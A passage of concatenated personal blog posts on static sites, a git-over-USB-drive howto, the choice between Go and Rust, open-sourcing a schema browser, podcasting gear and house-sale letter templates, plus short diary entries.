The new saviour is serverless (functions as a service) so that we can still add
dynamic stuff to these static sites.
Yes I can go read endless articles about how to *do* all this stuff, and turn
my CV and skills on their head so I can sell the hot new thing. But what I
actually want to know now is....
# What are *you* doing with dynamic static sites?
Have you tried it? As a pet project? As a commercial project?
Did it go well? Is it the new future or is it just for niche needs?
I feel like because this is all *sooo* new, that it's not clear yet how well
adopted this stuff is or will be, and how much of the old is being thrown out
and rewritten.
---
# My opinion...
...based on good knowledge of tech but not based on any actual experience is that
it depends entirely on the type of thing you are building:
* Low volume intranet/extranet style sites - don't bother, asp.net / rails is
fast enough, and it will cost you more to develop a blended static/dynamic
thing.
* E-commerce: totally worth it because you can handle any spike in traffic to
your front page, and serverless lets you seamlessly scale the dynamic parts.
Caveat **it will be more expensive to build** but that's okay because money in
is proportional to how many customers you can serve well.
* Government or other highly accessible services - don't do it. You can't meet
the accessibility needs if half your site's critical behaviour is done in
client-side javascript with calls off to serverless functions in the cloud. I
might be wrong about this, I hope I am. Maybe it's possible but just hard.
* Your blog and other traditionally CMS driven sites: just [use jekyll for your
own blog](/2019/06/24/setting-up-a-jekyll-blog/) and put it on github pages.
For more complicated commercial sites static site generation is a big win in
terms of technical complexity reduction, reliability improvements and speed
improvements for users. Which static site generator you use will depend on your
organisation's internal needs. (Can everyone use git? Or do you need a UI for
people to type in? How much money do you have?)
* Etc. (there are sooo many reasons for tech, I've just picked a few)
----
# Speak out now
Before you go, comment below.
What have your experiences been with the shift to dynamic-static sites? Have
you done any of it? Do you think I'm right/wrong about any of this?
<file_sep>---
layout: post
title: Nightly Shutdown, a new product from Proven Works
date: '2008-07-03T19:30:00.006Z'
author: <NAME>
tags:
- software
- shameless plug
- sys admin
- active directory
- microsoft
modified_time: '2008-07-03T19:59:11.428Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2690488523107244834
blogger_orig_url: https://timwise.blogspot.com/2008/07/nightly-shutdown-new-product-from.html
---
Congratulations to <NAME>, a good friend of mine, and his company
[Proven Works](http://www.provenworks.com/) on getting the [first
release](http://joelmansford.wordpress.com/2008/07/02/new-utility-to-shutdown-your-network-pcs-at-night/)
of [Nightly Shutdown](http://www.nightlyshutdown.com/) out of the door.
This looks to be a great product and hopefully will make system administrators'
lives easier and greener. It's a utility for ensuring that the computers are
off when you want them to be, and can be deployed through active directory
making the sys admin's life easier. There's a 10 PC free trial available, so
check it out at the [download
page](http://www.nightlyshutdown.com/DownloadRequest.aspx).
[](http://www.nightlyshutdown.com/)
Without even looking I know this will be a good
product and fantastically well supported. Best of luck to all at Proven Works,
and to all the potential users and buyers out there, don't forget to check it
out and provide any feedback you can.
<file_sep>---
layout: post
title: sharing work between computers with a usb flash drive and git
date: '2008-05-29T23:36:00.007Z'
author: <NAME>
tags:
- howto
- backup
- dev
- linux
- git
- oss
- svn
modified_time: '2008-06-04T17:18:17.112Z'
thumbnail: http://farm4.static.flickr.com/3180/2500350904_0b0c2a44f3_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-4719348621403422584
blogger_orig_url: https://timwise.blogspot.com/2008/05/sharing-work-between-computers-with-usb.html
---
I couldn't find anything exactly matching this on the net when I was figuring
it out, so here's what I did.
This is working against a remote svn (subversion) server, but applies even
without one.
On the first computer, grab your git working copy from svn with git-svn clone
(or clone a git repo, or just start a new one).
mkdir ~/project.git
cd ~/project.git
git-svn clone svn://project-server/trunk
git repack #for good measure
Plug in your usb flash drive/stick/external harddrive, I'll presume it's a
vfat/fat32/fat16 formated device mounted at `/media/flash`. Create an empty
repository on the drive, I'll use a bare one as there's no need to keep the
working copy as well.
mkdir /media/flash/project.git
git --bare init /media/flash/project.git
Then add the flash drive git repo as a remote source in your local git repo.
"flash" is the name I've given to the remote branch reference, you can call it
whatever you like.
git remote add flash /media/flash/project.git
If you push immediately it will fail (as I discovered) because fat doesn't
support the execute flag on files, so all the hooks are automatically active.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/2500350904/"><img
src="https://live.staticflickr.com/3180/2500350904_0b0c2a44f3.jpg" alt="Photo of blue parrot"></a>
</div>
I deleted all the hooks as I wasn't planning on using them, this may be wrong
so no promises, but it seems ok so far for me. So remove the hooks with:
rm /media/flash/project.git/hooks/*
Then push your current local copy to the flash drive with:
git push flash
This will copy all your committed work onto the flash drive, even if you
haven't pushed it upstream to the svn server with `git-svn dcommit` yet. Bonus!
It won't copy any of your branches across though, so if you want them you
can add those independently with:
git push flash mybranch
Now move over to the second computer and plug the flash drive in. I'm making
the same assumptions on paths and devices. Do another completely independent
svn checkout as above:
mkdir ~/project.git
cd ~/project.git
git-svn clone svn://project-server/trunk
git repack #for good measure
Then add the flash drive's repo to the git repo on the second pc and pull all
changes from the flash drive, optionally including any branches:
git remote add flash /media/flash/project.git
git pull flash master
git pull flash mybranch #if you like
When you've committed changes to git or pulled the latest changes from svn on
either pc, you can then update the flash drive with the simple command:
git push flash
Which pushes all your changes on your master branch on to the flash drive. You
are now ready to run the pull command on the other computer to get back in
sync:
git pull flash master
If you don't push changes to the flash drive before committing to svn then
things will be very simple. If you push changes to the flash drive, and then
commit them to the svn server you will need to do a little more work. This is
because when you run "git svn dcommit" it pushes your latest git commits to the
svn server, deletes your locally committed changes, and then fetches them back
from the svn server. This means that git won't recognise your local changes as
being the same as the ones on the flash drive because they have different
commit messages and SHA1 hashes. Attempting to push to the flash drive fails with
the message `! [rejected] master -> master (non-fast forward)` as the old copy
of the commits are still there.
To resolve this you need to throw away the matching set of changes on the flash
drive. To do this you can use git reset as follows, where `HEAD~1` should be
the number of commits you need to throw away (eg `HEAD~3` to throw away the
last 3 commits that were pushed to the flash drive):
cd /media/flash/project.git
git --bare log #to see how many changes don't have svn information
git --bare reset HEAD~1
You can then push your changes as above.
cd ~/project.git
git push flash
I've glossed over subtleties with fetch vs pull, but hopefully you will find
this useful.
This howto makes use of git's ability to pull from multiple sources, and I've
found that git quite happily copes with changes that were checked in to svn
coming via the flash drive, even when later running "git-svn rebase".
Please do comment or contact me with any problems, errors, extra info and
feedback, and let me know if it was useful.
<file_sep>---
title: "swimming"
date: 2004-04-02
slashdot_url: https://slashdot.org/journal/67200/swimming
---
<p>It's been two weeks, but I was back in the pool for training this week, and I cycled there (admittedly not entirely through choice - temporary absence of car was prime motivation). Swam 0.9km in the hour and surprisingly not that tired.</p>
<p>Unrelatedly, just so you know my current desktop at work is a picture of v cute <1 month old kittens.</p>
<p>Never got any further with usb key thing, too much else on, and being a true programmer I'd hate to actually finish something once I've started it!</p>
<p>And J says <a href="http://www.dlink.co.uk/pages/products/DBT-900AP.asp">bluetooth for LAN</a></p>
<file_sep>---
layout: post
title: Creating a blogroll
date: '2007-09-03T20:13:00.001Z'
author: <NAME>
tags:
- howto
modified_time: '2009-12-26T16:09:04.738Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-555759280771564498
blogger_orig_url: https://timwise.blogspot.com/2007/09/creating-blogroll.html
---
Update 11th Sep 2007:
xsession responded to my support request, and the [opml](http://www.timwise.co.uk/blogroll.opml) file is now served, complete with the correct mime type.
* * *
Update 26th Dec 2009
Now on a linux host so no mime type issues now.
Podcast list added: [podcasts.opml](http://www.timwise.co.uk/podcasts.opml).
Now styled with custom xslt file [opml.xsl](http://www.timwise.co.uk/opml.xsl).
* * *
As people may want to see my rss and podcast subscriptions, I have created a blogroll for you.
I've started with an [OPML](http://en.wikipedia.org/wiki/OPML) file, created by hand and uploaded to my web host. Unfortunately my web host won't (currently) serve the ".opml" file extension so I've had to use .txt.
so [http://www.timwise.co.uk/blogroll.opml](http://www.timwise.co.uk/blogroll.opml) became [http://www.timwise.co.uk/blogroll.opml.txt](http://www.timwise.co.uk/blogroll.opml.txt)
I then validated the file with [http://validator.opml.org/](http://validator.opml.org/)
I then added my feed to [http://share.opml.org/](http://share.opml.org/) so you can now see the list at [http://share.opml.org/viewsharedfeeds/?user_id=7189](http://share.opml.org/viewsharedfeeds/?user_id=7189)
In the opml I've separated podcasts and news feeds, but share.opml doesn't use this info.
There is some [controversy](http://www.isolani.co.uk/blog/semanticweb/OpmlTheXmlFormatWithNoFriends) over opml, but hell, it does the job. We can all upgrade when a better alternative goes mainstream.
Useful references:
[http://www.kbcafe.com/rss/?guid=20051003145153](http://www.kbcafe.com/rss/?guid=20051003145153)
[http://www.rss-tools.com/opml-generators.htm](http://www.rss-tools.com/opml-generators.htm)
[http://www.bioneural.net/2005/10/09/iblog-opml-bloglines-reading-list/](http://www.bioneural.net/2005/10/09/iblog-opml-bloglines-reading-list/)
[http://nayyeri.net/archive/2007/02/17/create-a-blogroll-from-opml-files.aspx](http://nayyeri.net/archive/2007/02/17/create-a-blogroll-from-opml-files.aspx)
<file_sep>---
title: "mmmm cake"
date: 2004-11-01
slashdot_url: https://slashdot.org/journal/88851/mmmm-cake
---
<p>I've got the first cake I've ever made in the oven right now.<nobr> </nobr>:D</p>
<p>I've been flat out with work for ages and am knackered. I still haven't managed to get all my clocks running on GMT yet. I arrived in an empty field an hour early on Sunday - doh!</p>
<p>Does anyone know of anyone looking to share a place in Reading?</p>
<p>I got a childrens book in my shreddies the other day. At first I thought bah, humbug, another irritating marketing tactic. But now I've finished the cereal, and extracted the book from the packaging and am enjoying it! I guess it's infinitely better than the biodegrade-proof waste of hydrocarbons they normally include.</p>
<p>Oooh, five mins till my cake's done.<nobr> </nobr>:)<br>It's risen...<br>I'll let you know how it tastes.</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
title: "Guitar Book"
date: 2004-09-22
slashdot_url: https://slashdot.org/journal/84543/guitar-book
---
<p>I would appear to have finally managed to order <a href="http://www.amazon.co.uk/exec/obidos/ASIN/0825694000/026-8427743-1791615">Solo Guitar Playing</a> from Amazon.co.uk. Hopefully it'll turn up soon. I've not been impressed with Amazon, it took me three attempts to persuade them to put my order through properly. I wonder whether their site is broken in <a href="http://www.mozilla.org/">Mozilla</a>. It was quite a change from the good experiences I had years ago when ordering from them. I was close to actually using a real bookshop. I asked them to find my old account, but I received no response at all. Hrmmm.</p>
<p>Anyway, nuff ranting. I'm looking forward to continuing the excercises in the book (by <NAME>) which is very well written and doesn't make learning any harder than it needs to be. I borrowed a copy off my neighbour, thank you neighbour, "but that's a breach of copyright" I hear you cry... Look I bought the book. OK? Sharing works. End of story. If I didn't buy it then stopping someone showing it to me doesn't exactly make me more inclined to buy it. I'll be expecting a letter from the digital rights people any minute! Oops, that sounded like another rant.</p>
<p>Hrm.</p>
<file_sep>---
title: "Splash"
date: 2003-12-04
slashdot_url: https://slashdot.org/journal/54069/splash
---
<p>Yay! I did TWENTY! lengths of the pool this morning. It's a 25 metre pool so that's half a kilometer! Did take 3/4 hour mind, with lots of panting between lengths.</p>
<file_sep>---
title: "Bloody Banks"
date: 2004-01-13
slashdot_url: https://slashdot.org/journal/58139/bloody-banks
---
<p>Cahoot just managed to cost me 80 pounds, in a day.</p>
<p>==============================<br>To: <EMAIL><br>Subject: Banking error.</p>
<p>Hello,</p>
<p>You've bounced three transactions on my current account and charged me £60 all on the 12th Jan. Despite there being a transfer to cover the whole amount made on the same day.</p>
<p>I am very annoyed and will be leaving cahoot unless this is resolved to my satisfaction.</p>
<p>Please refund the £60 to my account immediately and make arrangements to cover charges I will receive for the three failed transactions, plus a small sum to cover the expenses I will incur in dealing with BT, Egg & Student Loans Co.</p>
<p>Egg will charge £20.<br>I have yet to contact BT and Student Loans Co, but doubtless sorting this out will be a problem.</p>
<p>Yours</p>
<p><NAME>.</p>
<p>--------------------<br>Edit:<br>After much email ping pong they finally refunded the 60 quid they charged me. Still moving banks tho.</p>
<file_sep>---
title: Choosing a programming language for timslist
layout: post
---
I'm working on a new thing, [timslist.uk](https://timslist.uk/), and of course with the first thing out the way (a domain), the second thing is the choice of programming language. Excuse me, I'll be back in a few years with an answer.
## Goals
I primarily want something that I can keep hosting costs low as possible while it has no income, for as long as possible, something that doesn't become an unmaintainable nightmare, and something that I would be able to get decent programmers to work on in the future without creating a new unmaintainable mess.
## Hypothesis
The hypothesis is that I can hack away on the side, build something that compiles to web assembly for sharing logic with front-end, use manifests to make it installable on mobile until I can justify full mobile apps (which are *very* high maintenance thanks to the api & app store churn) and have infinite runway while I figure out what works thanks to the consulting.
## The big question, GoLang or Rust?
Currently I'm considering GoLang and Rust, which are both languages that would give me the ability to serve vast user numbers with relatively low costs. (I can dream right? Maybe I'll even succeed...)
I'm giving this *a lot* of thought because should I succeed then this is probably one of the hardest things to change amidst the chaos of a runaway startup; and the choice has very real consequences.
(P.s. In case anyone wonders, I'm happy to carry on consulting in C# land and hack on other things outside of client time.)
## What do I want out of a language?
1. Something I'll enjoy working on in the short to medium term while it's just me building it.
2. Something that would allow me to attract great collaborative coders (not rock stars) to work on it with or for me later on when I can show revenue.
3. Something that will keep hosting costs as low as possible to maximize my pre-revenue ability to scale the user base while supporting it with contracting.
4. Something I can run server and client side (with WASM) to avoid duplication of code that I can ill afford.
5. Something that allows me to build up advanced abstractions that allow me to operate and pivot without re-writing reams of code.
6. Something that has enough good quality library support that I'm not going to drown in unfinished or missing dependencies.
7. Ideally something that might allow me to build some unique technical advantages over the competition.
### GoLang
I wrote [schema explorer](https://github.com/timabell/schema-explorer) in GoLang which was educational. I still appreciate the simplicity of the language, and having worked on C# 2.0 that was still simple I appreciate the value of being able to pick up anyone's code and refactor it into shape, something no longer possible in the sprawling language that is C# 10 or whatever they've got to now. On the other hand I was left with the feeling that abstractions would be less high-level resulting in more code to wrangle for the same amount of functionality; something I can ill afford as a lone programmer at this stage.
### Rust
[Rust has been the most loved language for 7 years in a row](https://survey.stackoverflow.co/2022/#overview) which must mean something, right? It is low level and fast, but it also doesn't shy away from high-level abstractions that I appreciate as a programmer. To give myself a better idea as to what it's like to work in I've been working on [gitopolis](https://github.com/timabell/gitopolis/), this has helped me get beyond the (excellent) docs. So far it's, erm, hard!
I want to enjoy this project, and I also want it to be written in something that attracts great coders for many years just in case this is successful. The kind of coders that are more than just writers of reams of mediocre code.
My main worry with Rust (and to a lesser extent GoLang) is the incompleteness of libraries, frameworks and integrations; leading to endless toil and dead ends that I just don't have the engineering resources to contend with.
#### Popularity curves & engineering talent
Ruby has seen a rise and fall in popularity with the best coders as the basecamp-induced excitement faded and the kool kids moved to the next big thing, probably something with types or functional programming.
C# has a vast army of not-very-good programmers (who create endless projects for me to improve at work).
It's hard to tell where GoLang and Rust fit in these curves.
I suspect GoLang is likely to bore the better coders in the end, and although it will prevent the less good coders hurting themselves quite so badly I'm not sure I want that crowd.
Rust is definitely a sharper and harder to use tool, which is the kind of thing that attracts the hot talent. But equally, when they get bored of the challenge they move on like locusts to the next hot thing, leaving the businesses that chose Rust behind with a dearth of talented people to work on their existing code.
I can't tell if Rust will buck that trend and be sustainably cool, or if the cool coders will all head off to the next big thing by the time I have need of many engineers.
I'm also worried that Rust will attract the C++ over-engineering crowd who will write incredible code that no-one else can comprehend while the business goes out of business due to not shipping anything users actually care about. (Sometimes called "write-only code"!)
### Articles of persuasion
[Endler's article on GoLang vs Rust](https://endler.dev/2017/go-vs-rust/) makes me think I will *enjoy* building in Rust more, which is important for a project that I plan to be solo on for a long time, and have to want to work on it day in day out regardless of the challenges of life to stand a chance of success.
[Loris Cro's piece on choosing GoLang over Rust for the enterprise](https://kristoff.it/blog/why-go-and-not-rust/) is very compelling and I think probably has the argument that I've been looking for to persuade me that I should choose GoLang rather than Rust for timslist. I'm looking for something that will do engineering at scale in the long run while keeping hosting and programmer costs down.
Completely opposing this, and also very compelling is the story of [Why Discord is switching from Go to Rust](https://discord.com/blog/why-discord-is-switching-from-go-to-rust), where they show their massively improved metrics thanks to a rewrite of a GoLang microservice into Rust, along with assertions from experience of being able to keep engineering (relatively) small, and iterate fast. They say they are using Rust extensively in production which is reason for confidence in it as a choice as Discord probably has far more demanding needs than timslist would have any time in the next 20 years if it took off like a rocket.
[Early Impressions of Go From a Rust Programmer](https://betterprogramming.pub/early-impressions-of-go-from-a-rust-programmer-f4fd1074c410?gi=4ae004f7c897) is interesting because on the one hand it pretty much all points towards GoLang being the right answer (I happen to like the use of upper/lower case for public/private), however towards the end it shows some things that are missing that might make it harder to ever use higher level abstractions, and it notes the fact that nil-pointer de-refs are still a runtime failure in GoLang.
## Articles on Rust versus GoLang
* This is a must read on GoLang and Rust: <https://bitfieldconsulting.com/golang/rust-vs-go>
* <https://endler.dev/2017/go-vs-rust/> this one makes me think that perhaps using the hard road of Rust would give me some opportunities for hard-to-copy features in future (such as responsiveness, stability)
* <https://news.ycombinator.com/item?id=15266066> interesting discussion of the endler post
* <https://kristoff.it/blog/why-go-and-not-rust/> - a very persuasive and level-headed article that explains the tradeoff in terms of real enterprise development (something I'm painfully familiar with).
* <https://codeburst.io/should-i-rust-or-should-i-go-59a298e00ea9?gi=8338640ecce8> - mentions that Rust can be made hard to read by other devs, an important point.
* [Why Discord is switching from Go to Rust](https://discord.com/blog/why-discord-is-switching-from-go-to-rust) - powerful article on how much better Rust is than GoLang for making the best use of server resources and providing low-latency high-throughput capabilities, with no GC related spikes in latency. A strong argument for Rust over GoLang.
* <https://blog.boot.dev/rust/concurrency-in-rust-can-it-stack-up-against-gos-goroutines/> compares concurrency and parallelism in Rust and GoLang in a short and enlightening style with some useful code samples. I think the differences are less important to the decision than the other factors above, clearly both can solve the problems as needed.
* <https://softwareengineering.stackexchange.com/questions/247298/how-are-rust-traits-different-from-go-interfaces> - dynamic and static dispatch
## Assimilating the tradeoffs
The pros and cons that are relevant to what I'm trying to do:
### In favour of GoLang
* Maintainable as more programmers added to team of varying quality and opinion (inevitable in the long run I think).
* Highly performant programs.
* Fast compile times on big codebases.
* I like the test library style (minimal, uncontrived, use real code to write tests).
* Has generics at last.
* Easy multi-threading (not sure I need this particularly).
* GC (easier than worrying about Rust's ideas).
* Continues to be used internally at google at scale so likely to be supported for a loooong time.
* Stated mission to remain a small language.
* Having watched C# go from being a truly knowable and useful language in 2.0 to being a sprawling mess with syntactic-sugar-itis in [C# 11](https://docs.microsoft.com/en-us/dotnet/csharp/whats-new/csharp-11), a state that makes it increasingly hard to work with the code of others and work well together in teams, I have no desire to set my own startup up for that fate.
* I'm guessing the ecosystem of libraries & frameworks for writing web things has matured since I last looked and is (I'm guessing) ahead of the Rust ecosystem.
* Explicit handling of errors by return (but also has panic available for burn-it-all-down errors, which can be caught).
### Against GoLang
* Error handling boilerplate.
* Module system is a bit confusing (perhaps they have it right and easy now?)
* Unknown future direction (do we know the future of any language really?)
* Code ends up quite verbose - volume of code can cause resistance to change.
* Dull, so might not be able to retain great coders in the long run as the zeitgeist moves on to hip'er pastures.
* No pattern matching coolness. I don't know if I'm just overexcited about discovering this way of coding or if it's actually important. No doubt I'll gain more perspective with practice.
* [Why Go Is Not Good by Will Yager](https://yager.io/programming/go.html)
### In favour of Rust
* Highly performant programs.
* Immutable by default (this is huge!)
* No null-ref errors (hooray!)
* Interesting new toy to learn.
* Potentially able to make higher level clean abstractions than in go.
* Created by Mozilla who we love.
* Owned and run by the independent [Rust Foundation](https://foundation.rust-lang.org/), so perhaps free from the dubious influence of commercial interests. (Though people don't ignore those that pay them).
* "Most loved language", but what does that mean? Possibly easier to attract talent that want to work in Rust? But will they be the right kind of talent? And how long will that last?
* No runtime means smaller WASM files I think, and there seems to be [lots of ways to optimise wasm file size in Rust](https://rustwasm.github.io/book/reference/code-size.html)
### Against Rust
* Harder to learn.
* Takes longer to write a single piece of functionality up front.
* Unknown future direction.
* The [Rust foundation is new](https://foundation.rust-lang.org/news/2021-02-08-hello-world/), and unproven in ability to maintain the language over the long term.
* I heard that there may be issues with the completeness and maintenance of libraries ("crates") in the Rust ecosystem, this is of particular concern when it comes to security issues. Perhaps this will improve, or perhaps I am misled. Every ecosystem has its security issues, it's a tough world out there at the moment no matter your platform.
* I clearly don't know what I'm doing yet, given how long it's taking me to build gitopolis.
* "Fighting the borrow checker" (perhaps a worthy price for eliminating whole classes of programming error at compile time).
* Perhaps a more limited pool of Rust programmers available than GoLang programmers. If all I can find is a few relevant coders it's going to be harder to filter for other traits such as not-being-an-asshole, or communication skills.
* Layers and layers of boilerplate error/match handlers (or so I heard). Not sure if this is an issue yet, I need to get more experience to judge.
* Language for C++ coders, not people who want to build simple business value fast. Might encourage over-engineering for what should be straight-forward simple solutions to simple business needs.
* Complex language with many ways to solve problems, that might result in it being harder to maintain as programmers and styles come and go.
## What now?
I need to sleep on all this research, and spend some more time building gitopolis with all this in mind.
Currently there's a bit of me that thinks I "should" use GoLang as the "boring" option that would result in minimal drama, but my heart is definitely pulled towards Rust right now, and that's important because I have to actually want to work on this thing.
To be continued ...
<file_sep>---
title: "Pringles"
date: 2004-07-05
slashdot_url: https://slashdot.org/journal/76506/pringles
---
<p>Yay! My relations <a href="http://www.pringle.demon.co.uk/">on film</a> / now on the<br>net.</p>
<p>Super challenge too. Worthy of b3ta methinks.</p>
<file_sep>---
title: Why I made SQL Schema Explorer open source
layout: post
---
# What is SQL Schema Explorer?
It's a database schema & data browser that can follow foreign keys and draw
diagrams that I spent years building because I wanted it to exist and I thought
it might make a good first product.
# Why charge?
I'm pretty busy these days but I like working on software and building things
like this, to justify the amount of time that goes in I can no longer just have
it as a time-consuming hobby. I've also been learning about entrepreneurship as
a possible extension or next step from time-for-money contract-programming
services.
The idea was that if I could get enough yearly subscribers to the software then
I could get balsamiq-like success and focus on making it better and better for
the people using it.
# Why open source now?
I got plenty of interest and interactions by my standards, more than I've ever
had for something I've published; but I never got more than one good friend paid
up beyond a generous trial. The conversations I had with people were full of
enthusiasm for the idea but not for parting with money to buy it. One
particular conversation was very positive until the idea of putting the
theoretical purchase in front of the manager was raised and then suddenly it
didn't seem viable at all; which I think speaks volumes. Useful, but not useful
enough to risk any political capital to get it, even for a pretty insignificant
amount of money. I then had a coaching call with [<NAME>](https://justinjackson.ca/) and as part of that he suggested putting it
to one side. Up to this point I'd been unable to leave the idea alone; it had
been something I really wanted to exist. I've always worked with relational
databases, and this seemed like a painful gap. At this point I had finally
added every feature that I'd ever dreamed it should have, and the intrinsic
motivation to just build for the sake of building was waning, and without the
demands from paying users for more features it's hard to justify continuing to
pour hours in even if it is on the train.
At this point there were 100 people on the mailing list (drip sent my first
bill!), one paying user/fan (Hello David! Many thanks!), and zero MRR (monthly
recurring revenue). I'd spent a bit of money on hosting (I'm still paying
digital ocean to keep the [demo site](http://demo.schemaexplorer.io/) up).
I didn't want to let down the few people who had really liked it by having it
just vanish into the ether like so many failed startups. Fortunately this is
downloadable and installable software, not a SaaS that would have to be shut
down. I've always liked the open-source ethos, and given this was no longer a
direct financial opportunity it made sense to me to give it away freely under a
copyleft license.
It feels like having this as a portfolio piece given I sell coding for a living
won't do me any harm, and it makes it easier to take with me to client
projects, where I can use it to help them improve their database.
# Schema Explorer for client work
Here's some things I've been using schema explorer for to help my contracting clients
* Finding missing foreign keys without looking up complex `pg_schema` queries
* Analysing data in tables and sharing screenshots with the teams
* Sharing screenshots of the generated diagrams to improve team understanding
* Using it as a tool for discussing database design
* Finding records needed for troubleshooting and debugging
* Improving my mental model of the database structure
# Tell me more
It's now [A-GPL](https://en.wikipedia.org/wiki/Affero_General_Public_License)
which requires sharing any modified source code even if you are just letting
users access the generated site. If I'm giving my years of hard work for free,
I think it's only fair to require people to contribute their improvements back
to the community.
You can find the source code at <https://github.com/timabell/schema-explorer>
# Feedback
Please do get in touch if this sparked a thought or interest. Just a simple
email will do <<EMAIL>>
Thanks for listening.
<file_sep>---
title: Podcasting hardware setup
layout: post
---
## Current recording/playback setup
* [Samson Q2U cardioid XLR/USB Microphone](https://www.amazon.co.uk/gp/product/B001R747SG/) ~ £90
* USB means no need for a mixer or XLR adapter thing.
* Seems to be the best price/quality balance for me.
* The cardioid effect is pretty good, greatly reducing input of noises from elsewhere, especially if you talk really close to it (which I don't).
* [Proel RSM180 Microphone stand with boom](https://www.amazon.co.uk/gp/product/B002AI880O/) ~ £34
* Because standing desk, plus the Samson mic doesn't isolate vibrations from the desk if it's on a desk mount.
* [AKORD Microphone Swivel Pop Filter](https://www.amazon.co.uk/gp/product/B008AOH1O6/) ~ £5
* Because all the cool kids have one, and it was cheap. No idea if I really need it.
* Some old philips bluetooth headphones connected with a real headphone cable to the line out on the back of the Samson mic. I only use this for recording to avoid feedback from speakers. It has a feedback of your own voice which is disconcerting and nice in equal measure. For conference calls zoom and teams seem to do a decent job of cutting out the feedback, and I use mute a lot anyway so I don't bother with the headphones.
* The tiny and highly capable [Nobsound G3 2 Channel Bluetooth 5.0 Power Amplifier 100W](https://www.amazon.co.uk/gp/product/B07QQ47RTZ/) hifi amp, driving a pair of bookshelf Kefs for editing, music and conference calls.
* [Wharfedale Diamond SW150 Subwoofer](https://www.amazon.co.uk/gp/product/B0036EEOSQ) hiding at the back, because [frequencies below 100Hz](https://open.spotify.com/playlist/3GTZ7nPFzsoC8F0iaMWDpG?si=074a2d5d6ca84bc9) are important too.
## Video
Lately I've started [streaming the recording](https://www.youtube.com/watch?v=5KBFcuRWQ5s&t=1107s) of the show so it's worth mentioning the video (also for videoconferencing and work)
* [Logitech C920 HD Pro Webcam](https://www.amazon.co.uk/gp/product/B006A2Q81M/) ~ £60
* [Neewer USB lights x2](https://www.amazon.co.uk/gp/product/B07YFY7H7J) ~ £51
* [OBS (Open Broadcaster Software)](https://obsproject.com/) for live streaming + recording video+audio
* [restream.io](https://restream.io/) for streaming to multiple platforms
## Everything else
* Dell XPS15 (sometimes an XPS13)
* [Linux mint cinnamon](https://linuxmint.com/edition.php?id=288)
* [Standing desk](https://www.amazon.co.uk/gp/product/B00FOQD9EO) (no chair these days, previously kneely chairs and exercise balls).
* [Nextstand k2 Folding laptop stand](https://www.amazon.co.uk/gp/product/B01HHYQBB8)
* [Microsoft sidewinder X4 keyboard](https://www.amazon.co.uk/Microsoft-JQD-00006-Sidewinder-X4-Keyboard/dp/B0037KLSS8)
* [Logitech M570 trackball](https://www.amazon.co.uk/gp/product/B0042BBR2S) - I find the continuous thumb+finger grip needed for a mouse uncomfortable.
* [HP M477fdw laserjet + sheet feed scanner](https://www.amazon.co.uk/gp/product/B0151VIQLW) because life's too short for manually scanning one page at a time. Configured to automatically send scans to server over smb, then sync'd to all devices with syncthing. Win.
* [Cocoon security camera](https://www.amazon.co.uk/Cocoon-Security-Multi-Room-Protection-Compatible/dp/B0120BP0V0) - one of the few with no monthly fee, not sure there's a future in this one
* Giant mug for enough tea for an hour or two
## Pics

## Also-ran hardware
I started with a [Jabra Evolve 65 wireless headset](https://www.amazon.co.uk/gp/product/B074BPJRBW/) (~£130 because covid prices) but that heavily processes voice so while it's great for conference calls it's not good for anything beyond your third episode as people will unsubscribe just for the sound quality. Still use them for on the go conference calls and phone calls, and occasionally music (though my phone's bluetooth is currently borked).
I tried a [Blue Microphones Snowball USB Microphone](https://www.amazon.co.uk/gp/product/B002OO18NS/) (~£75) next, but that picks up *everything* even in its alleged cardioid mode.
## Out of my price range
Some of my friends who take it more seriously splashed out on a [Shure SM7B XLR Mic](https://www.shure.com/en-GB/products/microphones/sm7b) at a mere £389, and you have to buy an XLR mixer to run it. I have to say they sound lurvely, and when they knock it you hardly hear it so it's got excellent vibration isolation built in.
<file_sep>---
title: House buying and selling tip - make contact!
layout: post
---
I've learned a useful trick as part of buying and selling house(s) that I want to share with you just in case you find it useful. It could save you months of stress and delay, and maybe even save a deal that was going to fail.
## The big secret
Establish direct contact with the buyer/seller.
This will allow you to co-ordinate on making the sale happen and spot anywhere that the chain of communication has broken down. (E.g. both solicitors waiting for each other and a message between them that has vanished into the ether).
## But how?
This should be easy, but estate agents don't want you to go round them, and solicitors won't necessarily pass on your request. But there is a way round this.
### Buying a house
Simple, put a note through the seller's letterbox offering direct contact and including your contact details.
Here's [a template note to a seller](https://docs.google.com/document/d/1PkJ-XiodC7bW0fXikQP0Ur3EyDLy0z1wGhRLtzfSh0I/edit?usp=sharing) that worked for me in a previous purchase.
#### Sample letter to sellers
> To:
> The Owners,
> [Address of house
> you want to buy]
>
> [Your name here]
> [Your address (optional)]
>
> Contact: [01184960000 / <EMAIL>]
>
> [Date]
>
> Hi,
>
> We’re the people who put the offer in on your house, and we just wanted to give you the opportunity to make direct contact should you have any questions.
>
> We still absolutely love your house, and are very keen to proceed with the purchase. We are working with [Estate Agent] to move the sale of our house forward.
>
> Our contact details are above, don’t hesitate to get in touch should you wish to. We will of course still do all formal communications through the estate agents and solicitors, we’ve just found it handy in the past to also have direct contact.
>
> Yours,
>
> [Your name here]
### Selling a house
Write a formal letter with an offer of direct communications and include your contact details, PDF it and send it to your solicitor to pass on. Because this is officially a letter to the seller both solicitors will I think be obliged to pass it on.
Here's [a template note to a buyer](https://docs.google.com/document/d/1E677UNhLQq0CQkd4FuSfADiVMpGbHFdgztJzMQq4q9A/edit?usp=sharing) that worked for me in a previous sale.
#### Sample letter to buyers
> FAO: [Buyer Name Here]
> C/O: [Buyer’s Solicitors]
> Ref: [Property Address]
> Thu 4 Mar 21
>
> Dear [Name],
>
> This is just a personal note in addition to the formalities around the sale to let you know that we are keen for the process to go smoothly for both sides and that if there’s anything you need from us you are welcome to make direct contact as needed.
>
> All contractual and legal issues will continue to be dealt with through our solicitors and the estate agent, however we have found it useful in the past to be able to co-ordinate directly to ensure a smooth route to a completed sale.
>
> There is no pressure to accept, but should you wish to do so please find my contact details below.
>
> Confirmation of your receipt of this letter would be greatly appreciated.
>
> Yours
>
> [Your Name]
>
> [<EMAIL>]
> [01184960000]
## I ain't no lawyer
Do this at your own risk! Just as this could help, you could also use this communication channel to sink a deal that would have worked out, or even get yourself in legal trouble.
<file_sep>---
title: "Weekend / Talent? / Sport / Theatre"
date: 2004-10-04
